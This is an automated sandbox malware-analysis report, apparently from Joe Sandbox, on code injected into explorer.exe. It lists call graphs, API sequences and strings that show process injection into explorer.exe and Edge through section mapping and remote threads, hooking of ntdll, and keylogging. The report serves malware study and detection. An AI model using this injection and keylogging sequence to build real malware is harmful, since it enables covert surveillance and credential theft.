6d2a09 GetProcessHeap RtlAllocateHeap 791->857 794 6d109f 792->794 795 6d1093 792->795 830 6d10a5 794->830 795->787 798 6d1096 795->798 797 6d1053 RtlMoveMemory 797->792 858 6d13ae RtlZeroMemory VirtualQuery 798->858 799 6d10a4 801 6d2a09 GetProcessHeap RtlAllocateHeap 799->801 802 6d10bf 801->802 803 6d2a09 GetProcessHeap RtlAllocateHeap 802->803 804 6d10cc wsprintfA 803->804 809 6d10f3 804->809 805 6d276d OpenFileMappingA MapViewOfFile 805->809 806 6d129a Sleep 806->809 807 6d2841 lstrlen lstrlen 807->809 808 6d275a UnmapViewOfFile CloseHandle 808->806 809->805 809->806 809->807 810 6d2a09 GetProcessHeap RtlAllocateHeap 809->810 812 6d1285 809->812 811 6d1150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 811->812 813 6d1171 Process32First 811->813 812->808 814 6d29eb VirtualQuery GetProcessHeap HeapFree 812->814 815 6d118d 813->815 816 6d127e FindCloseChangeNotification 813->816 814->812 817 6d1190 CharLowerA 815->817 816->812 818 6d11ab lstrcmpiA 817->818 819 6d1266 Process32Next 817->819 818->819 820 6d11c3 818->820 819->817 819->820 820->816 820->819 821 6d12ae 16 API calls 820->821 825 6d11d6 820->825 821->820 822 6d26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 822->825 823 6d2724 VirtualQuery 823->825 824 6d1208 lstrcmpiA 824->825 825->819 825->822 825->823 825->824 826 6d18bf 30 API calls 825->826 826->825 828 6d101e 827->828 828->787 829 6d2a09 GetProcessHeap RtlAllocateHeap 828->829 829->790 887 6d2a09 GetProcessHeap RtlAllocateHeap 830->887 832 6d10bf 888 6d2a09 GetProcessHeap RtlAllocateHeap 832->888 834 6d10cc wsprintfA 836 6d10f3 834->836 837 6d129a Sleep 836->837 838 6d1285 836->838 839 6d2841 lstrlen lstrlen 836->839 889 6d276d OpenFileMappingA 836->889 892 6d2a09 GetProcessHeap RtlAllocateHeap 836->892 837->836 949 6d29eb 838->949 954 6d275a UnmapViewOfFile CloseHandle 838->954 839->836 842 6d1150 RtlMoveMemory CreateToolhelp32Snapshot 842->838 843 6d1171 Process32First 842->843 845 6d118d 843->845 846 6d127e FindCloseChangeNotification 843->846 847 6d1190 CharLowerA 845->847 846->838 848 6d11ab lstrcmpiA 847->848 849 6d1266 Process32Next 847->849 848->849 850 6d11c3 848->850 849->847 849->850 850->846 850->849 856 6d11d6 850->856 893 6d12ae 850->893 853 6d2724 VirtualQuery 853->856 854 6d1208 lstrcmpiA 854->856 856->849 856->853 856->854 912 6d26c9 OpenProcess 856->912 918 6d18bf 856->918 857->797 859 6d13e4 858->859 979 6d2a09 GetProcessHeap RtlAllocateHeap 859->979 861 6d1402 GetModuleFileNameA 980 6d2a09 GetProcessHeap RtlAllocateHeap 861->980 863 6d1418 GetCurrentProcessId wsprintfA 981 6d2799 CryptAcquireContextA 863->981 866 6d145f RtlInitializeCriticalSection 986 6d2a09 GetProcessHeap RtlAllocateHeap 866->986 867 6d151b 868 6d29eb 3 API calls 867->868 870 6d1522 868->870 872 6d29eb 3 API calls 870->872 871 6d147f Sleep 987 6d25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 871->987 874 6d1529 RtlExitUserThread 872->874 878 6d1533 874->878 875 6d1496 GetModuleHandleA GetProcAddress 876 6d14b5 875->876 877 6d14c6 GetModuleHandleA GetProcAddress 875->877 995 6d1f3a 876->995 880 6d14d9 877->880 881 6d14ea GetModuleHandleA 877->881 878->794 882 6d1f3a 3 API calls 880->882 1005 6d1e89 881->1005 882->881 885 6d25f1 10 API calls 886 6d1501 CreateThread CloseHandle 885->886 886->867 887->832 888->834 890 6d2794 889->890 891 6d2781 MapViewOfFile 889->891 890->836 891->890 892->842 894 6d12c5 893->894 910 6d13a4 893->910 894->910 955 6d29bd VirtualAlloc 894->955 896 6d12d9 lstrlen 956 6d2a09 GetProcessHeap RtlAllocateHeap 896->956 898 6d12f0 899 6d1351 898->899 957 6d2841 lstrlen lstrlen 898->957 900 6d29eb 3 API calls 899->900 909 6d1375 900->909 903 6d1399 963 6d29ae VirtualFree 903->963 904 6d1329 RtlMoveMemory 959 6d2569 904->959 905 6d1353 RtlMoveMemory 908 6d2569 2 API calls 905->908 908->899 909->903 911 6d1388 PathMatchSpecA 909->911 910->850 911->903 911->909 913 6d271c 912->913 914 6d26e7 IsWow64Process 912->914 913->856 915 6d26f8 IsWow64Process 914->915 916 6d270a 914->916 915->916 917 6d2715 CloseHandle 915->917 916->917 917->913 919 6d2724 VirtualQuery 918->919 920 6d18d9 919->920 921 6d18eb OpenProcess 920->921 922 6d1b1c 920->922 921->922 923 6d1904 921->923 922->856 924 6d2724 VirtualQuery 923->924 925 6d190b 924->925 925->922 926 6d1919 NtSetInformationProcess 925->926 927 6d1935 925->927 926->927 964 6d1b26 927->964 930 6d1b26 2 API calls 931 6d197c 930->931 932 6d1b19 CloseHandle 931->932 933 6d1b26 2 API calls 931->933 932->922 934 6d19a6 933->934 970 6d1bbd 934->970 937 6d1b26 2 API calls 938 6d19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 937->938 939 6d1a2b 938->939 940 6d1af4 CreateRemoteThread 938->940 941 6d1a31 CreateMutexA GetLastError 939->941 945 6d1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 939->945 942 6d1b0b CloseHandle 940->942 941->939 944 6d1a4d CloseHandle Sleep 941->944 943 6d1b0d CloseHandle CloseHandle 942->943 943->932 944->941 946 6d1aed 945->946 947 6d1a92 WriteProcessMemory 945->947 946->942 946->943 947->946 948 6d1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 947->948 948->946 950 6d2724 VirtualQuery 949->950 951 6d29f3 950->951 952 6d2a07 951->952 953 6d29f7 GetProcessHeap HeapFree 951->953 952->838 953->952 954->837 955->896 956->898 958 6d130c RtlZeroMemory 957->958 958->904 958->905 960 6d2577 lstrlen RtlMoveMemory 959->960 961 6d25a1 959->961 960->961 961->898 963->910 965 6d1b3a 964->965 969 6d195a 964->969 966 6d1b4a NtCreateSection 965->966 967 6d1b69 965->967 966->967 968 6d1b7e NtMapViewOfSection 967->968 967->969 968->969 969->930 971 6d1bd4 970->971 977 6d1c06 970->977 972 6d1bd6 RtlMoveMemory 971->972 972->972 972->977 973 6d1c69 974 6d19b6 NtUnmapViewOfSection 973->974 976 6d1c87 LdrProcessRelocationBlock 973->976 974->937 975 6d1c17 LoadLibraryA 975->974 975->977 976->973 976->974 977->973 977->975 978 6d1c47 GetProcAddress 977->978 978->974 978->977 979->861 980->863 982 6d27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 981->982 983 6d1445 CreateMutexA GetLastError 981->983 984 6d2805 wsprintfA 982->984 983->866 983->867 984->984 985 6d2827 CryptDestroyHash CryptReleaseContext 984->985 985->983 986->871 988 6d2631 987->988 989 6d2681 CloseHandle 988->989 990 6d2671 Thread32Next 988->990 991 6d263d OpenThread 988->991 989->875 990->988 992 6d2658 SuspendThread 991->992 993 6d2660 ResumeThread 991->993 994 6d2666 CloseHandle 992->994 993->994 994->990 996 6d1fad 995->996 997 6d1f44 995->997 996->877 997->996 1014 6d1fea VirtualProtect 997->1014 999 6d1f5b 999->996 1015 6d29bd VirtualAlloc 999->1015 1001 6d1f67 1002 6d1f71 RtlMoveMemory 1001->1002 1003 6d1f84 1001->1003 1002->1003 1016 6d1fea VirtualProtect 1003->1016 1006 6d2724 VirtualQuery 1005->1006 1007 6d1e93 1006->1007 1010 6d14fa 1007->1010 1017 6d1ed8 1007->1017 1010->885 1012 6d1eba 1012->1010 1022 6d1fea VirtualProtect 1012->1022 1014->999 1015->1001 1016->996 1018 6d1e9e 1017->1018 1020 6d1eea 1017->1020 1018->1010 1021 6d1fea VirtualProtect 1018->1021 1019 6d1f04 lstrcmp 1019->1018 1019->1020 1020->1018 1020->1019 1021->1012 1022->1010

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_006D276D 1 Function_006D29E9 2 Function_006D2569 3 Function_006D29EB 22 Function_006D2724 3->22 4 Function_006D1FEA 5 Function_006D1E66 32 Function_006D1CBF 5->32 6 Function_006D9AE0 7 Function_006D25F1 8 Function_006D24CC 9 Function_006D26C9 10 Function_006D2841 11 Function_006D255C 12 Function_006D17DC 42 Function_006D2A09 12->42 13 Function_006D1ED8 14 Function_006D275A 15 Function_006D182D 15->3 16 Function_006D29AE 15->16 23 Function_006D25A4 15->23 39 Function_006D200D 15->39 15->42 17 Function_006D12AE 17->2 17->3 17->10 17->11 17->16 28 Function_006D29BD 17->28 17->42 18 Function_006D26AE 19 Function_006D13AE 19->3 19->7 35 Function_006D1F3A 19->35 19->42 43 Function_006D1E89 19->43 47 Function_006D2799 19->47 20 Function_006D162B 34 Function_006D16B9 20->34 21 Function_006D10A5 21->0 21->3 21->9 21->10 21->14 21->17 21->18 21->22 31 Function_006D18BF 21->31 38 Function_006D288D 21->38 40 Function_006D268F 21->40 21->42 23->42 24 Function_006D3627 25 Function_006D1B26 26 Function_006D1E26 26->32 27 Function_006D20A1 27->3 27->8 27->28 30 Function_006D243D 27->30 27->38 41 Function_006D240F 27->41 27->42 44 Function_006D298A 27->44 29 Function_006D1BBD 30->42 30->44 31->22 31->25 31->29 33 Function_006D293E 33->3 33->42 34->3 34->12 35->4 35->5 35->28 36 Function_006D1FB4 35->36 36->26 37 Function_006D1533 39->3 39->27 39->42 41->10 43->4 43->13 43->22 45 Function_006D1581 45->3 45->22 45->33 45->34 45->42 46 Function_006D1000 48 Function_006D1016 46->48 48->0 48->3 48->9 48->10 48->14 48->17 48->18 48->19 48->21 48->22 48->31 48->38 48->40 48->42

                        Executed Functions

                        Function 006D1016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193stringsleepprocessCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,006D29F3,-00000001,006D128C), ref: 006D2731
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 006D1038
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D106C
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 006D1075
                        • GetCurrentProcessId.KERNEL32(?,006D1010), ref: 006D107B
                        • wsprintfA.USER32 ref: 006D10E7
                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 006D1155
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D1160
                        • Process32First.KERNEL32(00000000,?), ref: 006D117F
                        • CharLowerA.USER32(?), ref: 006D1199
                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 006D11B5
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 006D1212
                        • Process32Next.KERNEL32(00000000,00000128), ref: 006D126C
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D127F
                        • Sleep.KERNELBASE(000003E8), ref: 006D129F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateChangeCharCloseCreateCurrentFindFirstLowerNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                        • API String ID: 505104133-2805246637
                        • Opcode ID: c47f20a88e40928c1090702c175209b3e316f14930569476aea7b12aa91f6367
                        • Instruction ID: 52ed00166cdfe0dbed26ac246d06639ae72f992602f4787013ad0d286273988f
                        • Opcode Fuzzy Hash: c47f20a88e40928c1090702c175209b3e316f14930569476aea7b12aa91f6367
                        • Instruction Fuzzy Hash: 51510630E05311ABC714AF70DC9597A77ABEB59700F04062FF916CB3A1DA719E4586A2
                        Function 006D10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • wsprintfA.USER32 ref: 006D10E7
                          • Part of subcall function 006D276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 006D2777
                          • Part of subcall function 006D276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,006D10FE), ref: 006D2789
                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 006D1155
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D1160
                        • Process32First.KERNEL32(00000000,?), ref: 006D117F
                        • CharLowerA.USER32(?), ref: 006D1199
                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 006D11B5
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 006D1212
                        • Process32Next.KERNEL32(00000000,00000128), ref: 006D126C
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D127F
                        • Sleep.KERNELBASE(000003E8), ref: 006D129F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: FileHeapProcess32lstrcmpi$AllocateChangeCharCloseCreateFindFirstLowerMappingMemoryMoveNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                        • API String ID: 4279457983-2805246637
                        • Opcode ID: 0e10fa919795440fe74efd26f80a5b15aa890409b664abf3f99f2870f0823f03
                        • Instruction ID: 64f7a564454bf5b262474b52469ba78598d208d7df8891424257e9fac1113e1f
                        • Opcode Fuzzy Hash: 0e10fa919795440fe74efd26f80a5b15aa890409b664abf3f99f2870f0823f03
                        • Instruction Fuzzy Hash: BC412530E043156BC714AF709C9597E77ABEB99740F00062FF9528B3D1EB71DE4986A2
                        Function 006D9AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 122 6d9ae0-6d9ae5 123 6d9cad 122->123 124 6d9aeb-6d9af8 122->124 123->123 125 6d9b0a-6d9b0f 124->125 126 6d9b11 125->126 127 6d9b00-6d9b05 126->127 128 6d9b13 126->128 129 6d9b06-6d9b08 127->129 130 6d9b18-6d9b1a 128->130 129->125 129->126 131 6d9b1c-6d9b21 130->131 132 6d9b23-6d9b27 130->132 131->132 132->130 133 6d9b29 132->133 134 6d9b2b-6d9b32 133->134 135 6d9b34-6d9b39 133->135 134->130 134->135 136 6d9b48-6d9b4a 135->136 137 6d9b3b-6d9b44 135->137 140 6d9b4c-6d9b51 136->140 141 6d9b53-6d9b57 136->141 138 6d9bba-6d9bbd 137->138 139 6d9b46 137->139 142 6d9bc2-6d9bc5 138->142 139->136 140->141 143 6d9b59-6d9b5e 141->143 144 6d9b60-6d9b62 141->144 145 6d9bc7-6d9bc9 142->145 143->144 146 6d9b84-6d9b93 144->146 147 6d9b64 144->147 145->142 150 6d9bcb-6d9bce 145->150 148 6d9b95-6d9b9c 146->148 149 6d9ba4-6d9bb1 146->149 151 6d9b65-6d9b67 147->151 148->148 152 6d9b9e 148->152 149->149 153 6d9bb3-6d9bb5 149->153 150->142 154 6d9bd0-6d9bec 150->154 155 6d9b69-6d9b6e 151->155 156 6d9b70-6d9b74 151->156 152->129 153->129 154->145 157 6d9bee 154->157 155->156 156->151 158 6d9b76 156->158 159 6d9bf4-6d9bf8 157->159 160 6d9b78-6d9b7f 158->160 161 6d9b81 158->161 162 6d9c3f-6d9c42 159->162 163 6d9bfa-6d9c10 LoadLibraryA 159->163 160->151 160->161 161->146 164 6d9c45-6d9c4c 162->164 165 6d9c11-6d9c16 163->165 166 6d9c4e-6d9c50 164->166 167 6d9c70-6d9ca0 VirtualProtect * 2 164->167 165->159 168 6d9c18-6d9c1a 165->168 171 6d9c63-6d9c6e 166->171 172 6d9c52-6d9c61 166->172 173 6d9ca4-6d9ca8 167->173 169 6d9c1c-6d9c22 168->169 170 6d9c23-6d9c30 GetProcAddress 168->170 169->170 174 6d9c39-6d9c3c 170->174 175 6d9c32-6d9c37 170->175 171->172 172->164 173->173 176 6d9caa 173->176 175->165 176->123
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D8000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D8000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d8000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da362ac9e5a0de247ad7809a33c48f384b037aec9810ec4f41d84d4be55ef57b
                        • Instruction ID: b804f0c22f09517cc7cd5c478ee727242cae08d893ccd65066b9c2ad502a0826
                        • Opcode Fuzzy Hash: da362ac9e5a0de247ad7809a33c48f384b037aec9810ec4f41d84d4be55ef57b
                        • Instruction Fuzzy Hash: 94512571E542524AD7208E78DCC07F2B7A6EB52324B29077BC5E6CB3C6E7A45806C7B0
                        Function 006D276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 177 6d276d-6d277f OpenFileMappingA 178 6d2794-6d2798 177->178 179 6d2781-6d2791 MapViewOfFile 177->179 179->178
                        APIs
                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 006D2777
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,006D10FE), ref: 006D2789
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: bf67729f1c86a6ee657a2bc02865146923439ca1a1467fac1dbbea914559e9c8
                        • Instruction ID: fbeb69988a7ac59bd0646035637b138028672058648cf741d0dd7cfdfe044c91
                        • Opcode Fuzzy Hash: bf67729f1c86a6ee657a2bc02865146923439ca1a1467fac1dbbea914559e9c8
                        • Instruction Fuzzy Hash: 7FD01732B02232BBE3345E7B6C0CF83AE9EDF86AE1B010026B50DD2250D6608810C2F0
                        Function 006D2A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 180 6d2a09-6d2a19 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: bcade19f6c05ebd77d1b84b7e4282743ab5f874822d77d08283861d3658fce41
                        • Instruction ID: 360673df1b0edbb7b6a00a0b1cb9cbe44d0fb17b2bb37209a13b83822595096d
                        • Opcode Fuzzy Hash: bcade19f6c05ebd77d1b84b7e4282743ab5f874822d77d08283861d3658fce41
                        • Instruction Fuzzy Hash: D8A012B0E012106BDF0417A0AD0DF053719A780701F0050017206C01508D7001048722
                        Function 006D29BD Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 181 6d29bd-6d29cd VirtualAlloc
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,006D12D9,00000000,00000000,?,00000001), ref: 006D29C7
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: a14143bc792a211034efe28826a90ecb275c9d761873c119ef69fa5913bcbab3
                        • Instruction ID: 30a0fb2e9aa5ad817fa348360b45102c4f6b2f14b3cfc3e0f60f9ed91d392baa
                        • Opcode Fuzzy Hash: a14143bc792a211034efe28826a90ecb275c9d761873c119ef69fa5913bcbab3
                        • Instruction Fuzzy Hash: 79A002B0BD6310BAFF6997519D1FF252B199740F02F105145B30A7C2D056E4B600863E
                        Function 006D29AE Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 182 6d29ae-6d29bc VirtualFree
                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,006D13A4), ref: 006D29B6
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: f09d18f384ecda64bc35d1e53085b0336642f76b84366059cce9ac6865549971
                        • Instruction ID: ad74d095fe7e6594e86989e68c2af0f9fabf24696b703cdbc523f96e80dadb3d
                        • Opcode Fuzzy Hash: f09d18f384ecda64bc35d1e53085b0336642f76b84366059cce9ac6865549971
                        • Instruction Fuzzy Hash: 6CA00270B9171076EE7457206D0AF0567556780B02F2455457245A85D049A5A1488A19

                        Non-executed Functions

                        Function 006D18BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,006D29F3,-00000001,006D128C), ref: 006D2731
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 006D18F4
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 006D192F
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 006D19BF
                        • RtlMoveMemory.NTDLL(00000000,006D3638,00000016), ref: 006D19E6
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 006D1A0E
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 006D1A1E
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D1A38
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 006D1A40
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1A4E
                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1A55
                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006D1A6B
                        • GetProcAddress.KERNEL32(00000000), ref: 006D1A72
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1A88
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1AB2
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D1AC5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1ACC
                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1AD3
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1AE7
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006D1AFE
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B0B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B11
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B17
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006D1B1A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$ntdll$opera_shared_counter
                        • API String ID: 1066286714-2737717697
                        • Opcode ID: d5a890a37c4b23683ff25fd7acef6b526afa392e0dca82fa391e09b29cc63512
                        • Instruction ID: f4de1ca0106a10e16eaa115d3217e4e4f86d6b1d111e48a333ff59d34498751f
                        • Opcode Fuzzy Hash: d5a890a37c4b23683ff25fd7acef6b526afa392e0dca82fa391e09b29cc63512
                        • Instruction Fuzzy Hash: 3361AD71A05315BFD310DF209C84E6BBBEEEB8A754F04052AF949D7391D6B0DE048BA2
                        Function 006D2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 006D27B5
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 006D27CD
                        • lstrlen.KERNEL32(?,00000000), ref: 006D27D5
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 006D27E0
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 006D27FA
                        • wsprintfA.USER32 ref: 006D2811
                        • CryptDestroyHash.ADVAPI32(?), ref: 006D282A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 006D2834
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: 3952282cce378a784ceba4bba639873d4503d0c09b83577bd84c6e926d2d3e85
                        • Instruction ID: 08d307ece1fea48d6ec9e40b9f5af6162ee66ff1e684ac8056b86c1208018a79
                        • Opcode Fuzzy Hash: 3952282cce378a784ceba4bba639873d4503d0c09b83577bd84c6e926d2d3e85
                        • Instruction Fuzzy Hash: 1D115872D01118BFEB219F95EC88EEEBFBDEB48305F1040A6FA04E2260D6314F059B61
                        Function 006D162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 006D1652
                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 006D167A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: KeyboardStateUnicode
                        • String ID:
                        • API String ID: 3453085656-3916222277
                        • Opcode ID: 48c1a1b16a9ce5292bc0c8756579b06c02407dfe7cb466a8050250772f86a2c2
                        • Instruction ID: b51b620fddae0eb978a040f4cf1dcefb0bc24f5653d772a4d8bf347e9d1fb6eb
                        • Opcode Fuzzy Hash: 48c1a1b16a9ce5292bc0c8756579b06c02407dfe7cb466a8050250772f86a2c2
                        • Instruction Fuzzy Hash: 9F018432D01269ABDB34CB55DD45FFB73BEAF46B00F08441BE901EA351D7B0D9458AA2
                        Function 006D13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • RtlZeroMemory.NTDLL(006D5013,0000001C), ref: 006D13C8
                        • VirtualQuery.KERNEL32(006D13AE,?,0000001C), ref: 006D13DA
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 006D140B
                        • GetCurrentProcessId.KERNEL32(00000004), ref: 006D141C
                        • wsprintfA.USER32 ref: 006D1433
